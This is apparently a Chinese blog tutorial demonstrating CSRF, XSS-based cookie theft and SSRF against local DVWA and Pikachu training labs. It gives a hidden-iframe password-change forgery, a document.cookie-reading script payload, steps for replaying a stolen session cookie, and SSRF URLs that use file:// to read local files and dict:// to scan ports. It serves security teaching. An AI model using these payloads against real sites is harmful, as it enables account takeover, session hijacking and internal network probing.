CSRF+XSRF+SSRF简单介绍
CSRF
使用DVWA靶机,选择low级别,然后更改密码


伪造网页连接
http://localhost:8083/DVWA-master/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
我们自己写一个网页,把上面的网页连接写在里面,并更改里面的密码
<iframe hidden=""src="http://localhost:8083/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#"width="" height=""></iframe>
使用iframe标签,里面的hidden是为了隐藏这个连接页面的
这个img标签是为了优化网页内容的

被攻击者访问这个页面
前提是,被攻击者仍然使用着这个正确网页并用相同的浏览器打开我们发送的网页(由于cookie的原因)
这我们就把密码改成了我们自己设计的
XSRF
网站有xss漏洞
我们登录网站,上传存储型xss,获取目标用户的cookie值,一般用xss平台。这里为了演示,我们手动获取对方的cookie值
首先攻击方为火狐浏览器,先上传xss
<script>console.log(document.cookie)</script>
console.log(document.cookie)

这里是为了实验,用xss我们可以直接获取cookie
security=low; BEEFHOOK=HREwKDaS8h44nT2sUWZZxRDug1kS6cXCCfzDmbMia50Cg2A2cBXDbRmGKckYiFBh74ZdQH3JM6z9flVA;
PHPSESSID=armhiqtko1ja6i8h4eas7ogmu4

使用cookie登录
我们可以用别人的cookie进行身份冒充
现在我们对cookie进行修饰
document.cookie="security=low";
document.cookie="BEEFHOOK=HREwKDaS8h44nT2sUWZZxRDug1kS6cXCCfzDmbMia50Cg2A2cBXDbRmGKckYiFBh74ZdQH3JM6z9flVA";
document.cookie="PHPSESSID=armhiqtko1ja6i8h4eas7ogmu4";
然后我们进入登录界面输入cookie

由于我们当时是在这个页面获取cookie的,因此我们登录这个页面http://localhost:8083/DVWA-master/vulnerabilities/xss_s/


我们就可以随意访问这个网站了
SSRF

file://可以访问本地文件http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=file://c:\zz\2.txt

http://可以访问互联网文件http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.1.130/1.txt

dict://扫秒端口http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=dict://192.168.1.47:80

CSRF+XSRF+SSRF简单介绍的更多相关文章
- 跨站请求伪造 CSRF / XSRF<一:介绍>
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一 ...
- CSRF简单介绍及利用方法-跨站请求伪造
0x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP ...
- CSRF简单介绍及利用方法
x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP请 ...
- ABP官方文档翻译 6.7 CSRF/XSRF保护
CSRF/XSRF保护 介绍 HTTP动词 非浏览器客户端 ASP.NET MVC 特征 集成 布局视图 配置 ASP.NET Web API 特征 集成 集成到ASP.NET MVC客户端 集成到其 ...
- ASP.NET MVC CSRF (XSRF) security
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站 ...
- CSRF/XSRF 跨站请求伪造
CSRF/XSRF 跨站请求伪造 CSRF(Cross Site Request Forgery, 跨站域请求伪造)也称 XSRF, 是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安 ...
- asp.netcore mvc 防CSRF攻击,原理介绍+代码演示+详细讲解
一.CSRF介绍 1.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session ridin ...
- XSS、CSRF、SSRF联系&区别,防御
目录 区别和联系 防御 联系和区别 相同点: XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的. 相同点: XSS,CSRF,SSR ...
- [原创]关于mybatis中一级缓存和二级缓存的简单介绍
关于mybatis中一级缓存和二级缓存的简单介绍 mybatis的一级缓存: MyBatis会在表示会话的SqlSession对象中建立一个简单的缓存,将每次查询到的结果结果缓存起来,当下次查询的时候 ...
随机推荐
- UnityWebRequest使用总结
using System.Collections; using UnityEngine; using UnityEngine.Networking; /// <summary> /// 网 ...
- 精尽Spring Boot源码分析 - 剖析 @SpringBootApplication 注解
该系列文章是笔者在学习 Spring Boot 过程中总结下来的,里面涉及到相关源码,可能对读者不太友好,请结合我的源码注释 Spring Boot 源码分析 GitHub 地址 进行阅读 Sprin ...
- css图片显示文字(上浮)
<html> <head lang="en"> <meta charset="UTF-8"> <title>&l ...
- Hystrix 使用说明
1.什么情况下会触发 fallback 方法 名字 描述 触发fallback EMIT 值传递 NO SUCCESS 执行完成,没有错误 NO FAILURE 执行抛出异常 YES TIMEOUT ...
- sqlite用法总结
p.p1 { margin: 0; font: 16px "Helvetica Neue"; color: rgba(0, 0, 255, 1) } p.p2 { margin: ...
- Jsp自定义标签,配置tld文件
Program:Jsp自定义标签,.tld文件的配置 1 <?xml version="1.0" encoding="UTF-8" ?> 2 3 & ...
- 十九、.net core使用SoapCore开发webservice接口,以及使用HttpClientFactory动态访问webservice接口
使用SoapCore实现在.net core平台下开发webservice:以及使用HttpClientFactory动态访问webservice. 首先,需要在包项目下面引用SoapCore: 然后 ...
- C语言代码段
/* 功 能:将str字符串中的oldstr字符串替换为newstr字符串 * 参 数:str:操作目标 oldstr:被替换者 newstr:替换者 * 返回值:返回替换之后的字符串 */ char ...
- C语言常用函数笔记
strcmp 比较字符串: sscanf 读取格式化的字符串中的数据: memset 初始化内存的"万能函数",通常为新申请的内存进行初始化工作.对一段内存空间全部设置为某个字符, ...
- Apache Superset 1.2.0教程 (三)—— 图表功能详解
通过之前章节的学习,我们已经成功地安装了superset,并且连接mysql数据库,可视化了王者英雄的数据.使用的是最简单Table类型的图表,但是superset还支持非常多的图表类型. 本文我们将 ...